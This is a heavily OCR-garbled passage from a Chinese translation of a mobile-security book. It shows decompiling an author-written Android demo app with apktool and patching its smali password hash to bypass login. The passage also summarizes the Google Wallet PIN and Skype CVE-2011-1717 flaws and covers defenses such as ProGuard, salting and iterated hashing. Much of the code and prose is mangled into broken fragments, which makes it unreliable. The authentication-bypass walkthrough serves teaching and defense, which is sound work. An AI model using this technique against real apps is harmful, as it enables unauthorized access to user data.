drwxr-xr-x 7 pentestusrl pentestusrl 4096 2012-02-28 08:52 
drwxr-xr-x 3 pentestusrl pentestusrl 4096 2012-02-28 08:52 


pentestusri&tools-gibbons-vm-2:-/Android/android-sdk/tools/secure app$ cd smali/andsec/test/ 
pentestusrlétools-gibbons -vm-2:-/Android/android-sdk/tools/secure. app/smali/andsec/test$ ls -1 


total 60 


-rW-r--r-- 1 pentestusr1 pentestusr1 5621 2012-02-28 08:52 KeyPad$1. 


smali 


-rW-r--r-- 1 pentestusri pentestusrl 24968 2012-02-28 08:52 KeyPad.smali 
-- 1 pentestusr1 pentestusrl 487 2012-02-28 08:52 R$attr.smali 
-- 1 pentestusrl pentestusri 560 2012-02-28 08:52 R$drawable.smali 
1 pentestusrl pentestusri 707 201 8 08:52 R$id.smali 


1 pentestusrl pentestusrl 556 2012-02-28 08:52 R$layout. 


1 pentestusrl pentestusrl 520 2012-02-28 08:52 R.smali 


-DW-r--r-- 1 pentestusr1 pentestusri 713 2012-02-28 08:52 R$string. 


smali 


smali 


pentestusriétools-gibbons-vm-2:-/Android/android-sdk/tools/secure app/smali/andsec/test$ | 








图 7. 10 使 用 apktool 创建 的 smali 文件 
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-Closs Landsec/test/KeyPad$1; 
super Ljava/iang/Object; 
source 


-implements Landroid/view/View$0nClickListener; 


„annotation system Ldalvik/annotation/EnclosingMethod; 
value = Landsec/test/KeyPad; -»onCreate(Landroid/os/Bundle;)V 


pend annotation 


-annotation system Ldalvik/annotation/InnerClass; 


üccessFiags = 6x6 
name » ngil 
„eng annotation 


-field fingi synthetic this$0:Landsec/test/KeyPad; 


„field private final synthetic val$btnSubmit:Londroid/widget/Button; 


field private final synthetic val$etPass:Landroid/widget/EditText; 


„field private final synthetic val$tvLabel:Landroid/widget/Textview; 


„field private final synthetic valStwMsg:Landroid/widget/TextYiew; 


method constructor «init»(Landsec/test/KeyPad; Landroid/widget/Edi tText; Landroid/widget/Button; Landroid/widget/TextView; Landroid/wi dget/TextView; 


iput-object pi, , Landsec/test/KeyPad$1; -»this$0:Londsec/test/KeyPad; 


iput-object pZ, pO, Landsec/test/KeyPad$1; -»val$etPoss:;Londroid/widget/EditText; 


iput-object p3, pO, Landsec/test/KeyPad$1; -»vai$btnSubmit:Londroid/widget/Button; 


iput-object p4, , Landsec/test/KeyPad$1; -»vai$tvLabel :Landroid/widget/TextView; 


iput-object p5, , Landsec/test/KeyPadS$1; -»vai$tvMsg: Landroid/wi dget/TextView; 


line 36 
invoke-direct [pO 


图 7. 11 KeyPad. smali 文件 


步骤 2: 修改 应 用 程序 


如 图 7.12 所 示 ， 








Eh, X 





读 完 KeyPad $ 1. smali 文件 中 的 smali 代码 ， 可 以 推 





序 使 用 SHA-2569 算 法 计算 用 户 在 应 用 程序 登录 界面 输入 密码 的 散 列 值 。 然 后 将 计 


算得 到 的 密码 散 列 值 同 应 用 程序 存储 的 密 


用 程序 。 

















i 


如 图 7.13 中 标注 的 行 51 所 示 ， 将 该 散 列 值 (hash) 装载 到 变量 v8 























$ 码 进行 比 对 ， 如 果 匹 配 则 允许 用 户 登 录 应 


中 ， 并 与 


变量 v10 比较 。 如 果 这 两 个 值 相同 ， 用 户 即 可 登入 。 这 时 ， d a 
然后 增加 一 条 语句 将 该 值 写 人 到 v8 中 ， 从 而 根据 用 户 的 需 


Ig 





法 创建 一 个 散 列 值 ， 

















© SHA (Secure Hash Algorithm ， 安 全 散 列 算法 ) ， 由 美国 国家 安全 局 (NSA) 设计 ， 并 由 美国 国家 标准 
与 技术 研究 院 (NIST) 发 布 ， 是 一 种 能 计算 出 一 个 数字 信息 所 对 应 到 的 、 长 度 固定 的 字符 串 (又 称 


言 息 摘 要 ) 的 算法 ， 对 不 同 的 输入 信息 进行 计算 ,得 到 对 应 的 不 同 字符 串 的 概率 很 高 。 
SHA 家 族 的 五 个 算法 之 一 。 一 一 译 者 注 


























SHA-256 是 
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* virtual methods 
.method public getHash(Ljava/ilang/String;)[B 
„locals 5 
.parameter "password" 
.annotation system Ldalvik/annotation/Throws; 
value = d 
Ljava/io/UnsupportedEncodi ngException; 


.end annotation 


.prologue 
«line 70 
const/4 v1, @x0 


.line 71 
„local v1, mDigest:Ljava/security/MessageDigest; 
invoke-virtual {p0}, Landsec/test/KeyPad; -»getResources()Landroid/content/res/Resources ; 


move-result-object v2 
-Line 7Z 

.local v2, res:Landroid/content/res/Resources; 

const/highl6 v4, Ox7f04 

invoke-virtual {v2, v4), Landroid/content/res/Resources ; -»getString(I)Ljava/lang/String; 
move-result-object v3 

.line 75 

.local v3, sSalt:Ljava/lang/String; 


ttry start 9 
const-string v4, "SHA-256" 


invoke-static (v4), Ljava/security/MessageDigest; -»getInstance(l javo/lang/String; JL java/security/MessageDi gest; 
:try_end_9 
.catch Ljava/security/NoSuchAlgorithmException; {:try_start 0 .. :try end 0] :catch 0 


move-result-object v1 


-line 80 


:goto.0 
invoke-virtual {v1}, Ljava/security/MessogeDigest;-»reset()V 


„line 81 
invoke-virtual {v3}, Ljava/lang/String;->getBytes()[B 











图 7. 12 KeyPad $ 1. smali 文件 内 的 SHA-256 字符 串 





修改 密码 ， 绕 过 认证 。 图 7. 13 显示 的 是 使 用 apktool 工具 产生 的 原始 smali 文件 ， 
图 7. 14 显示 的 是 修改 后 的 smali 文件 ， 该 文件 包含 下 述 语句 (使 用 SHA-256 算法 
计算 “1234” 添加 盐 值 S 后 的 散 列 值 ) : 











const- string v8 , 
“2DD225ED6888BA62465 CF4C54DB21 FC17700925D0BD0774EE60B600B0172E916” 


需要 注意 的 是 ， 通 常会 在 hash 算法 中 加 入 一 个 “ 盐 值 ”。 找 出 该 盐 值 (以 
及 该 应 用 程序 原始 密码 的 hash 值 )， 就 留 给 读者 作为 练习 。 一 旦 读者 能 够 获得 
这 个 hash 值 和 盐 值 ， 就 可 以 通过 不 停 地 将 生成 密码 计算 得 到 的 hash 值 同 该 应 
用 程序 文件 中 存储 的 hash 值 相 比 较 ， 进 行 暴力 破解 。 相 应 答案 在 本 书 结尾 处 
提供 。 

步骤 3: 重新 编译 应 用 程序 

如 图 7.15 所 示 ， 可 以 使 用 命令 “apktool b” 将 修改 后 的 smali 代码 重新 汇编 ， 
打包 成 apk 文件 。 新 生成 的 apk 文件 放置 在 dist 目录 下 ， 如 图 7. 16 所 示 。 





























UE 


O 盐 值 (Salt) ， 就 是 在 密码 hash 过 程 中 添加 的 额外 的 随机 值 ， 用 于 防止 暴力 破解 出 密码 明文 。 一 一 译 











n 
E 
E 
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indsec/test/KeyPad; -»byteZhex( [B)L $ava/la 


v5, v10}, Londroid/content/res/Resources ; -»getString( I)L java/ 


supportedEncodingExcept ion; imd 8) :catch 8 


jlt-object vå 


;"»vgl$btnSuberi t 


/Button; -»setVisibility(i) 


;»val$tuLabel :Londroid/wi dget/TextViem; 


test/KeyPod$1; 











[7.13 — "if-eqz v10” 语 句 比较 v8 中 的 散 列 值 和 计算 产生 的 散 列 值 


将 新 打包 的 apk 安装 在 设备 或 模拟 器 上 之 前 ， 需 要 对 apk 文件 进行 签名 处 理 。 
如 图 7. 17 所 示 ， 读 者 可 以 在 网 上 免费 下 载 Signapk 工具 。 在 修改 后 的 应 用 程序 上 ， 
读者 可 以 输入 “1234” 作 为 密码 登录 并 使 用 该 应 用 程序 了 。 

上 述 技术 主要 用 于 分 析 、 反 编译 和 重新 编译 应 用 程序 。 本 节 以 作者 编写 的 应 用 
程序 为 例 ， 演 示 如 何 利用 该 应 用 程序 的 漏洞 绕 过 认证 机 制 ， 访 问 应 用 程序 的 数据 和 
功能 。 这 些 漏洞 并 不 仅仅 是 出 于 理论 上 的 假设 ， 在 很 多 类 似 的 案例 中 ， 都 存在 利用 
相似 的 问题 次 用 用 户 数据 的 情况 。 
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.line 44 

const við, &x7fó40002 

irvoke-virtuol {v5, við}, Londr /content/ fResources ; -»getString(1) 
:try_end ô 


Catch Ljava/io/UnsupportedEncodi ngE xception; try start 8 .. :try end 0) :cotch 6 


const-string v8, 


E Ro METER 


.line 51 
const-string v1, 


ine $2 


ige ject við, pð, Landsec/test/KeyPad$1;- 


invoke-virtuol (vi8, vil), Landroid/widget/But 


„line 53 
ect v10, pà, Londsec/test/KeyPad$1; etPass:Landroi d/ 


invoke-virtual {vi8, vi L tVisibili 


line 54 
9 ect við, pé, 


invoke-virtua 


.line 55 
iget-ob t við, pô, 


const/s v11, 6x6 

invoke-virtual {v10, v11}, Londroid/wid /TextView;->setVisi 
„line 60 

igoto.1 

const/4 v3, @x1 

„line 61 

„local v3, tration:1 


, Landsec/test/Ke 556: Landsec/testA 


invoke-virtual {v10}, Landsec/test/KeyPod; -»getApplicationContext() o tent/Context; 








PA 
x 
T 
m 
ex 
ES 
zi 
ILL 
cr 
pa 
Ss 
EE 
gi 
> 
出 
< 
oo 
TI 
pni 


AndroidManifest,xml  apktool.ym 
pentestusri8tools-gibbons-vm-2:-/Android/android-sdk/tools/secure app$ apktool b 
I: Checking whether sources has changed... 

I: Smaling... 

I: Checking whether resources has changed... 

I: Building resources. 

I: Building apk file... 
pentestusriétools-gibbons-vm-2:-/Android/android-sdk/tools/secure app$ ls -1l 


total 24 


-rw-r--r-- 1 pentestusr1 pentestusr1 592 2012-02-28 08:52 AndroidManifest.xml 
-rW-r--r-- 1 pentestusrl pentestusrl 92 2012-02-28 08:52 apktool.yml 
drwxr-xr-x 3 pentestusrl pentestusr1 4096 2012-02-28 09:01 

drwxr-xr-x 2 pentestusr1 pentestusr1 4096 2012-02-28 09:01 

drwxr-xr-x 7 pentestusrl pentestusrl1 4096 2012-02-28 08:52 

drwxr-xr-x 3 pentestusrl pentestusr1 4096 2012-02-28 08:52 
pentestusri&tools-gibbons-vm-2:-/Android/android-sdk/tools/secure.app$ | 


图 7.15 执行 “apktool b” 命 令 创 建 的 新 目录 
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pentestusrietools-gibbons-vm-2:-/Android/android-sdk/tools/secure.app/dist$ ls 


SecureApp .apk 


pentestusrletools-gibbons-vm-2: -/Android/android-sdk/tools/secure app/dist$ cd .. 
pentestusrletools-gibbons-vm-2:-/Android/android-sdk/tools/secure app$ ls 
AndroidManifest.xml  apktool.yml 


pentestusrlétools-gibbons-vm-2:-/Android/android-sdk/tools/secure app$ ls -l dist/ 
total 16 

“me 
pentestusrl@tools-gibbons-vm-2:~/Android/android-sdk/tools/secure_app$ 


S08 





图 7.16 新 打包 的 apk 文件 放置 在 dist 


f Anmol — bash — 75x24 


Last login: Wed Dec 12 14:38:57 on ttys9000 
anmmisra-mac:- Anmol$ java -jar —-/Downloads/signapk.jar —-/Downloads/certifi 


cate.pem -/Downloads/key.pk8 dist/SecureApp.apk modi fiedapp.apk| 





目录 下 





图 7.17 对 新 apk 文件 进行 签名 





7.4 实例 1: Google Wallet 漏洞 





ni 


信 ， 


除 。 











1 pentestusrl pentestusrl 15227 2012-02-28 09:01 SecureApp.apk 





Google Wallet 是 Google 公司 开发 的 移动 支付 软件 ， 可 以 使 用 户 在 手机 上 安全 地 
存储 信用 卡号 码 、 礼 品 卡 等 信息 ， 将 手机 变 身 为 移动 钱包 。 它 通过 NFC (Near 
Field Communication ， 近 场 通信 ) 技术 在 具有 PayPass 终端 的 结账 柜台 (例如 ， 
MasterCard? 的 PayPass 系统 ) 上 进行 安 支付 。 这 种 理念 是 ， 在 购买 商品 时 ， 采 用 
手机 支 付 来 替代 使 用 传统 的 信用 卡 、 借 记 卡 或 礼品 卡 进行 支付 。 


y a 
注意 : 
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U y 





























© PayPass， 是 MasterCard 组 织 推出 的 一 种 非 接触 式 信用 卡 系统 ， 非 # 
用 交易 。PayPass 系统 的 特 














可 以 完成 信用 授权 以 及 信 
会 。 一 译 者 注 





MasterCard. (万 事 





上 市 的 有 限 公 司 ， 
借 记 卡 。 一 一 译 者 注 
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EE 达 国 际 组 织 通过 

















国际 组 织 ) 是 一 个 由 超过 25000 个 金融 机 构 会 员 旨 





会 员 发 行 万 


色 是 不 必 将 信 


HJ “SE (Secure Element， 安 全 单元 )” 设 备 








确保 安全 性 。SE 设备 用 于 对 敏感 数据 进行 加 密 ， 如 信用 卡号 码 


用 户 需 要 提供 4 位 数字 的 PIN 码 ， 并 且 五 次 验证 失败 后 ， 





NFC 是 一 组 技术 标准 ， 它 能 够 通过 无 线 电 频 率 使 移动 设备 同 附近 的 设 
备 进行 通信 。 该 技术 可 以 应 用 在 支付 交易 和 数据 交换 等 方面 。 
NFC 使 用 RFID 进行 无 线 通 





等 。 要 想 访问 这 些 
这 些 数据 将 被 
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卡 交 给 店员 














Hi^ (MasterCard) 信 


FH 











卡 是 不 必 接 触 刷卡 机 就 
员 ， 可 有 效 减少 盗 刷机 


有 成 的 ， 在 美国 纽约 证 券 交 易 所 
月 卡 和 万 事 顺 ( Maestro) 
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事实 证 明 ， 该 PIN 码 以 二 进 制 的 格式 存储 在 SQLite 数据 库 中 ， 通 过 Google 的 
“ Protocol Buffers” 协 议 将 这 些 数 据 编译 成 序列 化 的 数据 ， 进 行 存储 或 交换 。Proto- 
col BuffersS 是 Google 开发 的 支持 库 ， 用 于 系统 之 间 传 递 信息 时 ， 对 结构 化 数据 进 
行 序列 化 处 理 。 从 这 些 二 进 制 字 符 串 中 可 以 获得 该 PIN 人 码 的 内 容 ， 它 包括 一 个 盐 值 
和 一 个 使 用 SHA-256 算法 计算 的 散 列 值 字符 串 。 知 道 PIN 码 只 由 4 位 数字 构成 的 
人 ， 能 够 通过 暴力 破解 的 方式 很 容易 地 破解 出 PIN 码 。 不 过 ， 只 有 对 设备 进行 root 
处 理 ， 才 能 够 获得 设备 上 的 这 一 数据 。 而 且 ， 有 时 无 需 太 费力 就 可 以 完成 对 设备 的 
root 处 理 ， 因 为 现在 已 经 有 很 多 工具 可 以 用 来 对 Android 设备 进行 root 操作 。 如 果 
读者 想 了 解 更 多 相关 的 内 容 ， 可 参考 网 站 : https: //zvelo. com/blog/entry/ google- 


wallet- security- pin- exposure- vulnerability。 











7.5 实例 2， Skype 漏洞 (CVE-2011-1717°) 


2011 4E, Android 版 本 的 Skype 应 用 程序 被 发 现 使 用 SQLite3 数据 库存 储 用 户 
敏感 信息 ， 例 如 ， 用 户 ID 、 联 系 人 信息 、 电 话 号 码 、 生 日 、 即 时 消息 记录 ， 以 
及 其 他 数据 。 而 且 ，Skype 应 用 程序 没有 使 用 适当 的 权限 (该 应 用 程序 使 用 了 
World readable 权限 ， 即 广泛 可 读 权 限 ) 对 这 些 数 据 进 行 安全 管理 ， 任 何 应 用 程 
序 或 用 户 都 能 够 盗 意 访问 这 些 数据 。 更 糟糕 的 是 ， 这 些 数据 没有 经 过 加 密 处 理 ， 
仅仅 采用 明文 的 方式 存储 在 SQLite 数据 库 中 。 美 国 科 技 网 站 Android Police 发 现 
该 漏洞 ， 并 且 编写 了 一 个 POC 攻击 程序 ， 能 够 利用 该 漏洞 从 Skype 应 用 程序 上 获 
取 数 据 。 





本 节 将 讨论 五 种 主要 的 防范 策略 ， 用 于 防止 应 用 程序 被 逆向 工程 ， 或 在 应 用 程 





© Protocol Buffers ， 简 称 为 protobuf， 是 Google 公司 开发 的 一 种 数据 描述 语言 ， 类 似 于 XML， 能 够 将 结构 
化 数据 序列 化 ， 可 用 于 数据 存储 、 通 信 协 议 等 方面 。 它 不 依赖 于 语言 和 平台 ， 并 且 可 扩展 性 极 强 。 
现 阶 段 官方 支持 C+ +, Java, Python 等 三 种 编程 语言 ， 但 可 以 找到 大 量 的 几乎 涵盖 所 有 语言 的 第 三 
方 拓展 包 。 该 协议 广泛 用 于 各 种 结构 化 信息 存储 和 交换 。 一 一 译 者 注 

© CVE (Common Vulnerabilities & Exposures， 公 共 漏 洞 和 暴露 ) ， 用 于 为 广泛 认同 的 信息 安全 漏洞 或 者 
已 经 暴露 出 来 的 弱点 给 出 一 个 公共 的 名 称 ， 它 是 国际 上 一 个 著名 的 漏洞 知识 库 ， 也 是 目前 在 国际 上 
最 具 公 信 力 的 安全 弱点 披露 与 发 布 机 构 ，CVE 组 织 是 一 个 由 企业 界 、 政 府 界 和 学 术 界 综合 参与 的 国 
际 组 织 ， 其 使 命 是 通过 非 营 利 的 组 织 形 式 ， 对 漏洞 与 暴露 进行 统一 标识 ， 使 得 用 户 和 三 商 对 漏洞 与 
暴露 有 统一 的 认识 ， 从 而 更 加 快速 而 有 效 地 去 鉴别 、 发 现 和 修复 软件 产品 的 脆弱 性 。CVE 于 1999 年 
9 月 建立 ， 目 前 其 命名 方案 由 MITER 公司 主持 ， 命 名 规则 采用 “CVE- 漏 洞 发 现年 份 -漏洞 编号 ” 规 
则 ， 本 节 所 述 的 Skype 漏洞 的 CVE 编号 为 CVE-2011- 1717。 一 一 译 者 注 
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序 被 逆向 工程 处 理 的 过 程 中 ， 尽 可 能 地 减少 信息 的 泄露 。 
7.6.1 代码 混淆 


代码 混淆 是 程序 开发 人 员 刻 意 使 用 的 一 种 处 理 ， 它 可 以 降低 源码 或 机 器 码 的 可 
读 性 ， 让 人 难以 理解 代码 的 真实 内 容 ， 从 而 增加 调试 或 逆向 工程 可 执行 文件 的 难度 。 
企业 一 般 使 用 这 种 技术 保护 他 们 的 卫 地 址 或 防止 企业 开发 的 应 用 程序 产品 被 算 改 。 

大 多 数 的 Android 应 用 程序 使 用 Java 语言 编写 ， 因 为 Java 代码 会 被 编译 成 类 文 
件 这 种 字 节 码 ， 运 行 在 虚拟 机 上 。 同 使 用 C/C ++ 语 言 编译 出 的 二 进 制 可 执行 文件 
THEE, Java 生成 的 字 节 码 文件 更 容易 被 道 向 工程 或 反 编 译 。 因 此 ， 不 能 仅仅 依靠 代 
码 混淆 保护 知识 产权 或 用 户 隐私 ， 必 须要 假设 存在 这 种 情况 ， 即 某 人 通过 反 编 译 
apk， 能 够 或 多 或 少 地 获得 应 用 程序 的 源码 。 所 以 ， 与 完全 依赖 代码 混淆 的 做 法 相 
反 ， 本 书 建议 应 当 尽 可 能 多 地 依靠 “服务 器 端 处 理 (Server Side Processing)” 策 
略 ， 保 护 应 用 程序 的 信息 安全 ， 这 部 分 策略 的 内 容 ， 将 在 下 一 节 介 绍 。 

ProGuard 是 用 于 Android 系统 的 、 可 免费 获得 使 用 的 Java 混 消 器 之 一 ， 它 能 够 
压缩 并 混 涌 Java 类 文件 ， 检 测 并 删除 类 文件 中 没有 用 的 类 、 变 量 属性 ， 以 及 函数 
等 。 而 且 ，ProCuard 还 能 够 用 较 短 的 〈 且 有 可 能 是 毫 无 实际 意义 ) 名 字 将 类 文件 
中 的 这 些 变量 重新 命名 。 经 过 这 些 处 理 ， 增 加 了 破解 apk 文件 需要 的 时 间 。Pro- 
Guard 工具 已 经 被 集成 到 Android 内 置 系统 中 ， 只 有 使 用 release (发 布 ) 模式 编译 
的 应 用 程序 才能 使 用 ProGuard 工具 。 相 反 ， 使 用 debug 模式 编译 的 应 用 程序 不 能 使 
用 系统 内 置 的 ProGuard 工具 。 

如 果 想 要 使 用 内 置 的 ProGuard 工具 并 使 其 能 够 作为 AntS 或 Eclipse? 编译 过 程 
中 的 一 个 步骤 自动 运行 ， 需 要 在 properties. cfg 文件 中 设置 proguard. config 属性 ， 该 
文件 位 于 Android 应 用 程序 项 目的 根 目 录 下 ， 如 图 7. 18 所 示 。 

图 7. 19 和 图 7.20. 显示 的 是 使 用 JD-GUI 工具 查看 反 编 译 后 的 代码 。 其 中 ， 
图 7. 19 显示 的 是 未 经 代码 混 消 处 理 的 代码 ， 图 7. 20 显示 的 是 使 用 ProGuard 工具 
进行 代码 混淆 处 理 后 的 代码 。 通 过 这 两 张 图 的 对 比 可 见 ，ProGuard 工具 缩短 了 类 的 
名 字 ， 并 重新 命名 类 名 ， 相 同 的 处 理 也 出 现在 类 文件 中 的 函数 和 变量 属性 上 面 。 由 
于 这 只 是 一 个 简单 的 应 用 程序 ， 代 码 混 消 并 没有 使 这 两 张 对 比 截 图 内 容 产生 较 大 的 
不 同 ,但 对 于 复杂 的 应 用 程序 来 说 ， 代 码 混淆 的 效果 将 会 更 加 明显 。 





































































































O Ant 是 Apache 软件 基金 会 JAKARTA 目录 中 的 一 个 子 项 目 ， 它 是 一 种 基于 Java 的 build (编译 ) TH, 
理论 上 来 说 ， 它 有 些 类 似 于 (Unix) C 中 的 make 编译 工具 ， 但 没有 make 的 缺陷 。 译 者 注 

OQ Eclipse 是 一 个 开放 源 代码 的 、 基 于 Java 的 可 扩展 开发 平台 。 就 其 本 身 而 言 ， 它 只 是 一 个 框架 和 一 组 
服务 ， 用 于 通过 插件 组 件 构 建 开发 环境 。Eclipse 附带 了 一 个 标准 的 插件 集 ， 包 括 Java 开发 工具 (Ja- 
va Development Kit, JDK) 等 ， 户 可 通过 下 载 安 装 Android 插件 ADT ( Android Development Tool, 
Android 开发 工具 ) ， 将 Eclipse 构建 成 Android 应 用 程序 的 开发 平台 。 一 一 译 者 注 
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| rS. 
Jid 


dcs 


JB Package Explorer Z5 








TELS y. IPe y mro 


x 








k isemixedcasecLassnames 





V HelloWorld -dontskipnonpubliclibrarvclasses 

r&s -dontpreverify 

> BS gen [Generated Java Files] -verbose 

> gl Android 4.0.3 -optimizations !code/simplification/arithmetic, !field/*, !class/merging/* 
S assets 

Y Es bin -keep public closs * extends android.app.Activity 

> Gres -keep public class * extends android.app. Application 
il AndroidManifest.xmi -keep public closs * extends android.app.Service E 
£ -keep public class * extends android.content.BroadcastReceiver 
À proguard.cfg -keep public class * extends android. content .ContentProvider 
B project.properties -keep public class * extends android.app.backup.BackupAgentHelper 

. 


-keep public class * extends android.preference.Preference 
-keep public class com.android.vending.licensing.IlicensingService 


-"keepclasseswithmembernames class * { 
native «methods»; 
} 


-keepclasseswithmembers class * { 
public «initsCandroid.content.Context, android.util.AttributeSet); 





embers class * [ 
android.content.Context, android.util.AttributeSet, int); 





-keepclassmembers class * extends android.app.Activity { 
public void *(android.view.View); 
) 


-keepclassmembers enum * { 

public static **[] values); 

public static ** valueOf(java.lang.String); 
} 


-keep class * implements android.os.Parcelable { 
public static final android.os.Parcelable$Creator *; 


} 





T 


图 7.18 查看 Eclipse 开发 环境 下 的 proguard. cfg 文件 






originaljar © 
b OH META-INF 
* 88 clobile.samples.securepass 





|| SecurePassActivity.lass (9 
[package clobile.samples.securepass; 











élimport android.app.Activity; 
public class SecurePassActivity extends Activity 


public void onCreate(Bundle savedInstanceState) 


Lt 
24 | super. onCreate(savedInstanceState); 
25 | setContentView( 2130903040) ; 
| 
28 |  TextView tvLabel = (TextView)findVienById(2131034112); 


29 Button btnSubmit = (Button)findVienById(2131034114); 
30 EditText etPass = CEditText)findVienById(2131034113); 
31 TextView tvMsg = (TextView)findView8yId(2131034115); 


9 onCreate(Bundle) : void 








33 btnSubmit.setOnClickListener(new View.OnClickListener(etPass, btnSubmit, 
t 
public void onClick(View v) { 
| 36 String sHash = "abcdel"; 
| 37 String sRand = "123456"; 
| 38 CharSequence cMessage = "Incorrect Password! Please try again"; 
| 
| 40 Resources res = SecurePassActivity.this.getResourcesO ; 
| 4 String sPassword = this.val$etPass.getTextO . toStringO ; 
| try 
| { 
| ac Babar bineh ~ CaremaBnerirtivitu dhie nabiineh/eBarrenndi: 


图 7.19 通过 JD-GUI ZEE RARA AAE ARI 


对 于 Java 语言 来 说 ， 或 许 ProGuard TAA ERYR a. BE, Æ 
有 其 他 选择 的 时 候 ， 就 必须 要 使 用 ProGuard 工具 。 
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obfuscatedjar €| - 





> d META-INF || SecurePassActivity.class 
[ [package clobi le. somples.sei 


Y E clobile.samples.securepass 
v [Ñ SecurePassActivity 
Y © SecurePassActivity 








$ import. anároid.app Activity; 





as a(bytel) : String | public class SecurePassActivity extends Activity 
€ onCreate(Bundle) : void it 
v Da | | public void onCreote(Bundle parasBundle) 
Y Qa | t. 
9 onClick(View) : void |i n; cnCreate(parosBundte) ; 


etta intent Vi ew(2130903040) ; 

|  paromBundle = (TextView)findView8yId(2131034112); 

| tton localButton = (Button)findView8yId(2131034114); 
indVienById(2131034113); 













M 
| calTextView = (TextView) findVienById(2131034115); 
l| Heisse ton SetünClickListen rre (thay localtditText, localButton, paramBundle, localextViewm)); 
H 


| sane final byte[] CString paramString) 


1! Pues sts iageDigest = 

| String str = getResources().getStri In 23964572); 
i try 
j t 
i localMessageDigest = MessageDigest.getInstance("SHA-256"); 


jo 

| | etch QioSuchAlgoritheException localNoSuchilgori thaException) 
! 
| localNoSuchAlgori thmException, printStackTrace(); 

|o] 

|  localMessageDigest.reset(); 

| localMessageDi gest . update(str. etytes 50); 

return lacalMessnnsfii aast. Ainest narams oe HRvtes "ITER" YY: 








图 7.20 通过 JD-GUI 查看 经 过 代码 混淆 处理 的 代码 


7.6.2 服务 器 端 处 理 


根据 应 用 程序 的 类 型 ， 可 以 将 敏感 操作 和 数据 处 理 放 在 服务 器 端 完成 。 例 如 ， 
nn o m A 
说 ， 很 多 程序 上 的 逻辑 处 理 过 程 都 是 放 在 服务 器 端 执行 的 。 一 旦 应 用 程序 认证 成 
动 ”并 且 用 户 身 份 的 有 效 性 通过 验证 ， 应 用 程序 就 能 够 依 千 服务 器 端 完成 大 部 分 的 
人 处 理 过程。 这 样 ， 即 便 使 用 逆向 工程 破解 了 编译 应 用 程序 生成 的 二 进 制 安装 文件 
(apk 文件 ) ， 应 用 程序 中 很 多 逻辑 实现 的 内 容 也 不 会 被 镭 取 ， 因 为 这 些 逻 辑 内 容 都 
是 在 服务 器 问 完 成 的 。 


7.6.3 和 迭代 散 列 与 使 用 盐 值 


散 列 函数 容易 产生 碰撞 2。 而 且 ， 对 于 一 个 设计 不 良 的 散 列 函数 ， 不 排除 对 散 
列 值 成 功 实现 暴力 破解 的 可 能 。 但 是 ， 如 果 在 散 列 函数 的 设计 中 ， 最 大 化 地 提升 抗 
磁 撞 能 力 ， 暴 力 破 解 就 会 变 得 难于 实现 〈 除 非 政 府 机 构 采 用 极其 强大 的 计算 能 
进行 破解 ) SHA-2 系列 算法 族 就 属于 具有 较 强 的 抗 碰 撞 能 力 的 散 列 算法 。 

通过 使 用 盐 值 可 以 生成 更 健壮 的 hash 值 。 在 加 密 技 术 中 ， 盐 值 由 随机 比特 位 
(bit) 组 成 ,一 般 作为 hash 函数 的 输入 之 一 〈 这 也 是 一 种 抗 碰撞 的 方式 ) hash PR 

















”由 于 hash 固定 长 度 输出 的 特性 ， 必 然 会 存在 多 个 不 同 输入 产生 相同 输出 的 情况 。 如 果 两 个 输入 串 的 
hash 函数 的 值 一 样 ， 则 称 这 两 个 串 是 一 个 磁 撞 (Collision) 。 在 理论 范围 内 ， 存 在 一 个 输出 串 对 应 无 
穷 多 个 输入 串 ， 所 以 碰撞 具有 其 必然 性 。 一 一 译 者 注 
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数 的 其 他 输入 为 保密 内 容 ， 如 PIN、 密 钥 或 密码 口令 等 。 这 样 就 使 得 暴力 破解 变 得 
更 加 困难 ， 因 为 需要 更 多 的 时 间或 空间 ， 即 使 使 用 彩虹 表 破 解 也 是 如 此 。 彩 虹 表 是 
一 组 针对 构成 密码 的 各 种 可 能 的 字母 组 合 ， 预 先 计算 好 的 密码 hash 值 的 表格 ,用 
来 比 对 查找 密码 的 hash 值 ， 使 破解 者 更 容易 、 更 快 地 获得 密码 明文 。 它 是 一 种 以 
空间 换 时 间或 时 间 与 空间 折 中 的 例子 , 例如， 将 大 量 可 被 用 作 密 码 的 字符 组 的 
hash 值 提前 计算 出 来 ， 存 放 在 存储 空间 。 由 于 可 被 用 作 密码 的 字符 组 合 数量 庞大 ， 
所 以 大 量 计算 出 来 的 hash 值 将 占用 大 量 的 存储 空间 。 但 是 ， 用 户 在 破解 密码 时 ， 
只 需 通过 查询 存储 空间 ， 找 到 相 匹 配 的 hash 值 ， 即 原始 密码 的 字符 组 合 ， 从 而 降 
低 密码 破解 所 需 的 计算 时 间 。 

此 外 ， 本 书 推荐 使 用 迭代 hash 处 理 敏感 数据 。 也 就 是 将 数据 生成 的 hash 值 再 
输入 hash 函数 计算 hash 值 ， 如 此 反复 。 如 果 这 种 反复 计算 hash 值 的 次 数 足 够 多 ， 
最 终 产生 的 hash 值 将 相当 的 健壮 ， 足 以 应 对 任何 暴力 破解 攻击 ， 从 而 防止 攻击 者 
猜 出 最 初 的 hash 值 。 


7.6.4 选择 恰当 位 置 存储 敏感 信息 


合理 选择 敏感 信息 的 存储 位 置 (以 及 访问 方法 ) 和 上 文 介绍 的 各 种 技术 同样 
重要 。 假 如 在 公开 的 存 取 位 置 ( 例 如， 存储 在 values. xml 文件 中 、SD 卡 上 或 是 具 
有 公共 可 读 属 性 的 本 地 文件 系统 上 ) 存储 hash t, 那么 就 会 使 攻击 者 能 够 比较 容 
易 地 获取 到 这 些 敏感 信息 。Android 系统 提供 了 一 种 很 好 的 方式 限制 数据 访问 
只 有 明确 地 将 数据 设置 成 可 被 访问 获得 ， 其 他 应 用 程序 或 用 户 才能 访问 该 数据 。 默 
认 情 况 下 ， 只 有 具有 应 用 程序 自身 UID 的 其 他 程序 或 用 户 才 能 访问 归属 于 该 UID 
的 数据 。 

理想 的 存储 敏感 信息 的 位 置 可 以 是 数据 库 (如 SQLite) 或 参数 文件 (如 prefer- 
ence) ， 在 这 些 地 方 ， 其 他 应 用 不 能 对 其 进行 访问 。 


7.6.5 加 密 技术 


在 迭代 散 列 一 节 中 ， 已 经 讨论 了 如 何 使 用 户 的 密码 或 敏感 信息 保密 性 更 强 、 更 
不 容易 被 破解 ， 也 就 是 通过 使 用 加 密 技 术 ， 即 散 列 计算 和 盐 值 。 加 密 技 术 还 可 以 用 
于 保护 用 户 数据 ， 对 于 Android 系统 来 说 ， 主 要 有 两 种 加 密 方式 : Android 应 用 
